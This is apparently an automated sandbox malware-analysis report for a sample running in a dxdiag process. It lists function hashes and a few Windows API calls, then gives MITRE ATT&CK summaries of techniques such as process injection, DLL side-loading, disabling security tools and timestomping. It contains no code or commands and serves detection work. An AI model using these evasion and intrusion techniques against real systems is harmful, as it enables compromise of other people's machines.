API String ID:
Opcode ID: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
Instruction ID: 20f5ed072c6bfbda0bc91a0cdde0de7c4fc080ad42862f5d594c9abb615ab40b
Opcode Fuzzy Hash: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
Instruction Fuzzy Hash: F6912832B59A804BD72C897C4C623AABA834BD6234F2CC77EE6B6873E5D96C48454345

Function 0042E480 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
Instruction ID: 7a1eed898d1216762a2c7ff3d336fcba6ee216a9b47b043e4d7b41fbc61cb180
Opcode Fuzzy Hash: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
Instruction Fuzzy Hash: 4E711726B59AF047D328853D6C223B67A824FD6334F6DC36EE5F28B3E1D56D88058349

Function 0040EE70 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
Instruction ID: 3490b61dfd93ba184312fd33364581a50fe03d296d349fd53c95ac3e2b442cca
Opcode Fuzzy Hash: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
Instruction Fuzzy Hash: 9C713A72714B008FD3249A3DC9823ABBBE2AB95314F18493ED5E7C33C6E63994168316

Function 00438A90 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
Instruction ID: c9e52aa4780a1a71b0f6536462f5c40a3ec639637a903cde8fa83514c66493a3
Opcode Fuzzy Hash: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
Instruction Fuzzy Hash: 33514C31A053118BD7209F2888C056FF792EFCA324F29A62EF59557361DB79EC0287D9

Function 00426A10 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
Instruction ID: 5fccf0568e07a38315d86764f9ee9d51859a75a7ad21a5e232c3aae3b42cafbc
Opcode Fuzzy Hash: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
Instruction Fuzzy Hash: 6651F6B2714B094BC708CE2CEC9123AB7D2ABD5204F99C63DE956C7381EF78E9158785

Function 0041CA48 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
Instruction ID: a491210344505289bb21a907e851a53a7042adf8aad5960711688d9cdac3ce5c
Opcode Fuzzy Hash: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
Instruction Fuzzy Hash: 0D51E1B1A4C3118BC324CF14C89266BB7B2EF96704F59855EE8856B384E335EA45C78A

Function 0041C802 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
Instruction ID: 53513fe6c79870b6d8cfb68088b58b425f5e81915f7a899e94c8849bc048f5ff
Opcode Fuzzy Hash: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
Instruction Fuzzy Hash: CF51FFB525C3108BC718CF24C8916ABB7F2EFD6704F48995DE4858B3A0E339D901C74A

Function 0043B6F0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
Instruction ID: 8cf5b8e416399a360e4fa64b07ba8964707688b42fdc82ebe9d8400aceb4da68
Opcode Fuzzy Hash: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
Instruction Fuzzy Hash: B8517A3BA18725CFDB04DF28E89025AB3A2FF8A351F1A847DDA8587242D734DD41CB85

Function 0041A9B0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
Instruction ID: 8b22c1b07ae07e9e8c70e54b2664e987efbc7c12ed24ca91e0e63b8894becd6c
Opcode Fuzzy Hash: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
Instruction Fuzzy Hash: EB41DF741093818BC720CF25C8616ABBBF1EF93364F044A5CE5C28B381E3B99945CB9B

Function 004022B0 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
Instruction ID: 75762df367a30ba79ec702eae056234a675c2c7c4eda59630da6670717d7c4bd
Opcode Fuzzy Hash: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
Instruction Fuzzy Hash: 40618EB08007419BD3109F28ED4970BBAA0FF4136DF14473DE8AA966F1D375D9A5CB8A

Function 00426282 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
Instruction ID: c9803781c8c3e1c1503bbf2b7e0cb91ad599f48646208f78850af9b5bc693bbc
Opcode Fuzzy Hash: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
Instruction Fuzzy Hash: DB5150B5A483408FD3209F65A88076FB7E4EBC6304F14493EF594A7281EBB8D5018B8B

Function 00434C70 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
Instruction ID: a69caac395799761bf6e71e20599b88d1efc5e3bd1c132c25f0773fc5f0ec801
Opcode Fuzzy Hash: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
Instruction Fuzzy Hash: 01516DB15087548FE714DF29D49435BBBE1BBC8318F044A2EE5E987350E379DA088F86

Function 004264F2 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
Instruction ID: 4eb4d543e274e6005dd5ac3d1296328a5cf021be0d14d03e83e5a7fc676d431e
Opcode Fuzzy Hash: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
Instruction Fuzzy Hash: 98515FB5A483508FD3209F65A88076FB7E4EBC6704F04493EF594A7390DBB8D9018B8B

Function 00433875 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
Instruction ID: e982278c98a4a55a51dcc6fb07df31f24c4864dac0726d46ec862b3c15d8158c
Opcode Fuzzy Hash: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
Instruction Fuzzy Hash: A771E231A086918FC715CB3C885439EBFE16F5A324F19C799D4B99B3E2C7348946CB91

Function 0040E122 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
Instruction ID: 61c9cee79081f457ad2a062ba2558c50646c3fe9279bd5e78a79f88c837ed506
Opcode Fuzzy Hash: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
Instruction Fuzzy Hash: 22518372751A018BC328CE39CC82567B6D3FBE5314728CA3D9196C76E5DA78E8118748

Function 00436980 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
Instruction ID: 21dea60bbb219d656e905d7e418e96adc8bcbb3988d6d2a1a81a27e5a390af3f
Opcode Fuzzy Hash: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
Instruction Fuzzy Hash: 62513B712087955FC724DA28C4912BBB7E2EFCA304F05CA1DE4DA8B385D239ED05D786

Function 0041A7A0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
Instruction ID: f82dd9b0d87d4a5d6c48483010ad98791815e4d23863ac411e0dcac4d361aaf7
Opcode Fuzzy Hash: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
Instruction Fuzzy Hash: 57515A33A4A98047D328C93C5C213FA6A934FD7230B2D977FE5B2873E1C56D489A5306

Function 004029C0 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
Instruction ID: d41090bbc5cdf1eee4b9e767fbef583de22e64e79b7a5adf37564b72c8c73a6c
Opcode Fuzzy Hash: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
Instruction Fuzzy Hash: 8741FA3170C2654BC7289E2D8D5813ABBD24FC5618F0DCA7AE8C5AB7CBE5789D0097C9

Function 0040D9D6 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
Instruction ID: 9fa01659ad8de31616e7a3bece4b0ebd12d10b8bf800f35ceca4d3f4b48f7db6
Opcode Fuzzy Hash: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
Instruction Fuzzy Hash: 5251BF32B656018FD31CCF7CCC82666B6E3EB9531972DC53E9056C77A5DA38E8028748

Function 0043B7E0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
Instruction ID: a12b8c0182a61b8c0dcb24e574365e2446023a880a9609403b6df3a4a4656157
Opcode Fuzzy Hash: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
Instruction Fuzzy Hash: BB31593BA19B15CFE7089F79D89021B77A2FBCA350F2A847DDA8543652CB35D9018781

Function 0040D136 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
Instruction ID: 2adf1b471041e318d085131b5c25906aa0ef628fdecf1c7cc439bd873dbe0119
Opcode Fuzzy Hash: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
Instruction Fuzzy Hash: 2A21F736B106018BD72CCB38CCA163B7793ABCA31572DC13E9197C73E9DE34A8018614

Function 0041AEC5 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
Instruction ID: 157f9dc6c30a3f8e7012f38a3543129662c1ccbafda1b3b4c39616780386f915
Opcode Fuzzy Hash: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
Instruction Fuzzy Hash: 9E210E7540D3819BC7149B3888012AFFBA1AF93328F149A6DF5D297292D339C847C71B

Function 00402B90 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
Instruction ID: 96f90f60e8dd0990346840b1114267e9a804311747d2bbb38bbaf23e5c27bc8a
Opcode Fuzzy Hash: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
Instruction Fuzzy Hash: 4E11D632B182220BE75CDE62D8F967B6352E78931070A013EDE47673D1CEB0F801D264

Function 004180EC Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
Instruction ID: e867d9d1f28d7a5eba1ee3aa62fd3901ca7eafcffc61e3722708c4ddc888ec81
Opcode Fuzzy Hash: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
Instruction Fuzzy Hash: 6A019675A08340ABE3608F289940BABB7E6B78A314F245A2DE5C493255CB75D8428B9D

Function 00432AA0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 57554b220478db5cbed8bb508ca5b9341bb5a8124f106d97950563f0cb4ed476
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: FB112933A042D40EC3268D3C8900566BFA31B97234F1D539AF4B59B2D2D6668D8B9359

Function 00428DB0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
Instruction ID: 38d02f156ba9bea008bfc3cbf089b3dc91c799dc872ea954a9214ded2d150559
Opcode Fuzzy Hash: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
Instruction Fuzzy Hash: E301B5F1B0131147D7209E15A4C0B2FB2A96FA0708F58443ED80497382DFB9FC08C6A9

Function 0042A58E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
Instruction ID: 12b2805a1f20fa8b6142eba5500c80610d2c3edaf282c8c7ce7b4e803315b4ad
Opcode Fuzzy Hash: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
Instruction Fuzzy Hash: 45014C293456504BC31A8B39D8E0763BBE2EFE7301F5D85ADC4D28B74AC67ED8064706

Function 0041805C Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
Instruction ID: 8711fe80fd9cdcc946cfeee52c3a971414c24b006f2a8bfd417734f7af7e8c33
Opcode Fuzzy Hash: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
Instruction Fuzzy Hash: BA0149746142048BE724CB249C21BBBBBD1FB8F304F151A2DE1C5A3191CF64D880C60D

Function 0040A4FC Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
Instruction ID: 0c7f04cba0ebecf99243f2c815fb382dab3cd3855d7a05e12ca6b616032a23fd
Opcode Fuzzy Hash: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
Instruction Fuzzy Hash: F6C012BAD8002063C3298A1088601F8A2300686428B0BA328CC5A33B60C1299C4284E8

Function 00430E8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00430EC1
GetSystemMetrics.USER32 ref: 00430ED0

Strings

, xrefs: 00430F7B

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
Instruction ID: c462c863d7540d378f15546e975ceae7bdcd2c3f8effd4f67c5b55e1d1f3667c
Opcode Fuzzy Hash: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
Instruction Fuzzy Hash: 7A3183B09143148FDB40EF69D98965EBBF4BB88304F01853DE499DB364D774A948CF86

Function 0040B7A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408A7E), ref: 0040B7A6
FreeLibrary.KERNEL32 ref: 0040B7C7

Strings

Wu, xrefs: 0040B7A6, 0040B7C7

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
Instruction ID: 336dde16cfeb40de3b2ef609bf2c051ccccdb53c03003955ec431401e460c0aa
Opcode Fuzzy Hash: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
Instruction Fuzzy Hash: BEC0027A808400AFCE113FE5FE0A8283E25EB4670670061F4FD4541076DB324936FFA9

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
